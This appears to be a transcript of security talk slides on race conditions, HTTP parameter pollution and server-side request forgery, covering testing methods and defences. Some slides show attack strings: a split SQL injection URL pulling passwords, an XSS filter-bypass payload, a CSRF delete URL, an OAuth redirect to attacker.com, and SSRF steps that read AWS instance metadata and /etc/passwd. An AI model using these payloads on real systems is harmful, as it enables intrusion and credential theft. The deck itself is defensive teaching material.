The document discusses vulnerabilities and security risks that extend beyond the OWASP Top 10 list, focusing on race conditions, HTTP parameter pollution, and server-side request forgery (SSRF). It outlines methodologies for testing these vulnerabilities, as well as defensive strategies for mitigation. The information serves as a reminder that while the OWASP Top 10 is important, there are additional security concerns that need to be addressed in web applications.

1. Beyond OWASP Top 10
@insp3ctre

2. @insp3ctre
Aaron Hnatiw
Twitter: @insp3ctre
• Software developer
• College professor
• Security consultant
• System administrator
• Web developer
Senior security researcher,
Security Compass

3. @insp3ctre
What is this talk about?
@insp3ctre

4. @insp3ctre@insp3ctre

5. @insp3ctre
http://www.sans.org/reading-room/whitepapers/analyst/
2015-state-application-security-closing-gap-35942

6. @insp3ctre
OWASP TOP 10 2013
A1- Injection
A2- Broken authentication and session management
A3- Cross-site scripting (XSS)
A4- Insecure direct object references (IDOR)
A5- Security misconfiguration
@insp3ctre

7. @insp3ctre
OWASP TOP 10 2013 (CONT’D)
A6- Sensitive data exposure
A7- Missing function level access control
A8- Cross-site request forgery (CSRF)
A9- Using components with known vulnerabilities
A10- Unvalidated redirects and forwards
@insp3ctre

8. @insp3ctre
Race conditions
CWE-362

9. @insp3ctre
Making assumptions

10. @insp3ctre
ASSUMPTION

11. @insp3ctre
REALITY

12. @insp3ctre
Exploits

13. @insp3ctre
1. Unlimited money!
https://sakurity.com/blog/2015/05/21/starbucks.html

14. @insp3ctre
2. Draining Bitcoins from a
bug bounty reward
https://cobalt.io/cobalt/cobalt/reports/587

15. @insp3ctre
Testing for race conditions

16. @insp3ctre
WHITE BOX TESTING
1. Identify all shared data
2. Identify where that shared data is accessed across
systems
3. Find where that data access is not synchronized
4. Make a ton of requests

17. @insp3ctre
BLACK BOX TESTING
•Race The Web (RTW): https://github.com/insp3ctre/race-the-
web
‣Free, open-source tool
‣Built specifically to easily test for race conditions in web
applications.
‣Accompanying vulnerable web application for practicing
race condition testing: http://RaceTheWeb.io
•Burp Suite Intruder

18. @insp3ctre

19. @insp3ctre
Be careful of DoS.
Most bug bounties have restrictions such as:
https://hackerone.com/airbnb

20. @insp3ctre
Defence and mitigation

21. @insp3ctre
LOCKS
•Use locks on any shared resources.
‣Use pessimistic locking in your database.
‣Use our ORM’s optimistic locking.
‣Most programming languages have locking built-in.
‣File locks
✦This is what Microsoft Word uses (~$somefile.docx), as
well as most file synching platforms.

22. @insp3ctre
OTHER MITIGATIONS
•CSRF tokens
•Fast database
•Inserts over updates

23. @insp3ctre
Sources & further reading

24. @insp3ctre
SOURCES & FURTHER READING
• Hackfest 2016 - Racing The Web: https://youtu.be/
4T99v957I0o
•RaceTheWeb.io
•Beyond OWASP Top 10 - Race Conditions (http://bit.ly/
raceconditions)

25. @insp3ctre
HTTP parameter pollution
(HPP)
CWE-235

26. @insp3ctre
Applications interpret parameter values in different ways
https://dunnesec.com/category/attacks-defence/http-parameter-pollution/

27. @insp3ctre
Exploits

28. @insp3ctre
Leveraging HPP to get SQL injection:
http://example.com/search.aspx?q=select/*&q=*/
name&q=password/*&q=*/from/*&q=*/users
Result: q=select/*,*/name,password/*,*/from/*,*/users

29. @insp3ctre
Bypass WAFs, especially blacklist-based:
GET /index.aspx?a=<scrip&a=t>alert(&a=)</
scri&a=pt
Bypass input validation:

30. @insp3ctre
Better CSRF URLs:
http://example.com/admin?
action=post%26action%3Ddelete&user=1

31. @insp3ctre
Stealing OAuth credentials
from Twitter
https://hackerone.com/reports/114169
https://www.digits.com/login
?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE
&host=https%3A%2F%2Fwww.periscope.tv
&host=https%3A%2F%2Fattacker.com

32. @insp3ctre
Testing for HPP

33. @insp3ctre
Append existing parameters
with different values
Example: http://example.com/test?
id=12345&test=true&id=54321

34. @insp3ctre
With Burp Suite Intruder

35. @insp3ctre
SOURCES
•Form fields (search, login, etc.)
•Pagination
•Admin page identifiers
‣http://example.com/admin/
page=1&action=view&page=12345
•Find more by intercepting all POST requests & parameters

36. @insp3ctre
Automate with Burp Suite

37. @insp3ctre
Defence and mitigation

38. @insp3ctre
DEFENCE AND MITIGATION
•Dynamic testing (DAST)
•Find instances of parameters in source code- explicitly
select first or last
•Check your WAF
•Output encoding
•Best case- strip duplicate parameters before processing

39. @insp3ctre
Sources & further reading

40. @insp3ctre
SOURCES & FURTHER READING
•https://dunnesec.com/category/attacks-defence/http-parameter-pollution/ (@Dunn3)
•https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-
INPVAL-004)
•AppSec EU 2009 - presentation by Luca Carettoni and Stefano di Paola (https://
www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf)
•Split and Join white paper on bypassing web application firewalls with HTTP
parameter pollution, by Lavakumar Kuppan (http://www.andlabs.org/whitepapers/
Split_and_Join.pdf)
•Automated Discovery of Parameter Pollution Vulnerabilities in Web Applications, by
Marco Balduzzi, Carmen Torrano Gimenez, Davide Balzarotti, and Engin Kirda (https://
www.isoc.org/isoc/conferences/ndss/11/pdf/6_1.pdf)

41. @insp3ctre
Server Side Request Forgery
(SSRF)
CWE-918

42. @insp3ctre
SSRF - OVERVIEW
•Bypass firewalls
•Reach internal network
•Often an application attack becomes network attack
•Useful for enumeration and reconnaissance
‣Further hides attacker’s source IP
•Often introduced to bypass SOP (it’s a feature!)
•Can be leveraged to get XSS via returned content

43. @insp3ctre
Exploits

44. @insp3ctre
Querying AWS metadata
through SSRF
http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/

45. @insp3ctre
ATTACK STEPS
1. Found the following endpoint: https://play.esea.net/
global/media_preview.php?url=
‣Only loads images
2. Bypass: https://play.esea.net/global/
media_preview.php?url=http://ziot.org/?.png
‣https://play.esea.net/global/media_preview.php?
url=http://ziot.org/xss.html?.png

46. @insp3ctre
ATTACK STEPS (CONT’D)
3. Query http://169.254.169.254/ to pull AWS instance
metadata
‣https://play.esea.net/global/media_preview.php?
url=http://169.254.169.254/latest/meta-data/?.png
‣Guide: http://docs.aws.amazon.com/AWSEC2/latest/
UserGuide/ec2-instance-metadata.html

47. @insp3ctre
Google digs google
https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/

48. @insp3ctre
Normal interface, with response:

49. @insp3ctre
Let’s modify the post request...

50. @insp3ctre
Fun fact- Google was running a
minecraft server at
"minecraft.corp.google.com"

51. @insp3ctre
Testing for SSRF

52. @insp3ctre
TESTING FOR SSRF
•Is a URL provided in a request? Change to:
‣Another remote URL (e.g. google.com)
‣Loopback address (e.g. localhost, 127.0.0.1)
‣Local IP (e.g. 192.168.0.1, 10.10.0.1, 172.16.0.1)
‣Different protocol URL (e.g. “file://“, “ssh://“, “ftp://“)
‣Different port
•Burp Suite Intruder works really well for automating this
‣Sort by response sizes

53. @insp3ctre
TESTING FOR SSRF (CONT’D)
•Got XXE? Try specifying system or external URIs (e.g. file:///
etc/passwd)
‣More info: https://www.owasp.org/index.php/
XML_External_Entity_(XXE)_Processing
•Use Burp Suite’s Collaborator servers for external resources,
if you don’t have your own

54. @insp3ctre
Defence and mitigation

55. @insp3ctre
DEFENCE AND MITIGATION
•SOP exists for a reason
‣DO NOT use JSONP or other server workarounds
‣DO use CORS
•Again- whitelist allowed domains and protocols, and
sanitize input
•Access control between server and internal network

56. @insp3ctre
DEFENCE AND MITIGATION (CONT’D)
•Why whitelist protocols?
•PHP supported protocol URLs:
•file://
•http://
•ftp://
•php://
•zlib://
•data://
•Glob://
•phar://
•ssh2://
•rar://
•ogg://
•expect://
More: http://php.net/manual/en/wrappers.php

57. @insp3ctre
Let’s review

58. @insp3ctre
OWASP TOP 10 2013
A1- Injection
A2- Broken authentication and session management
A3- Cross-site scripting (XSS)
A4- Insecure direct object references (IDOR)
A5- Security misconfiguration

59. @insp3ctre
OWASP TOP 10 2013 (CONT’D)
A6- Sensitive data exposure
A7- Missing function level access control
A8- Cross-site request forgery (CSRF)
A9- Using components with known vulnerabilities
A10- Unvalidated redirects and forwards

60. @insp3ctre
BEYOND OWASP TOP 10
1. Race conditions
2. HTTP parameter pollution (HPP)
3. Server-side request forgery (SSRF)

61. @insp3ctre
None of these are on the
OWASP Top 10 2013

62. @insp3ctre
OWASP Top 10 2017 RC2

63. @insp3ctre
From the OWASP Top 10 RC2 guide

64. @insp3ctre
OWASP TOP 10 2017 RC2
https://github.com/OWASP/Top10/issues

65. @insp3ctre
Still applies!

66. @insp3ctre
Final message

67. @insp3ctre
The OWASP Top 10 is a good
start, but there’s much more

68. @insp3ctre
From the OWASP Top 10 RC2 guide

69. @insp3ctre
RESOURCES TO KEEP LEARNING
•HackerOne "hacktivity" feed: https://hackerone.com/
hacktivity
•Twitter
•Reddit /r/netsec
•HackerOne Zero Daily newsletter: https://
www.hackerone.com/zerodaily

70. Thank you
Aaron Hnatiw
@insp3ctre
aaron@securitycompass.com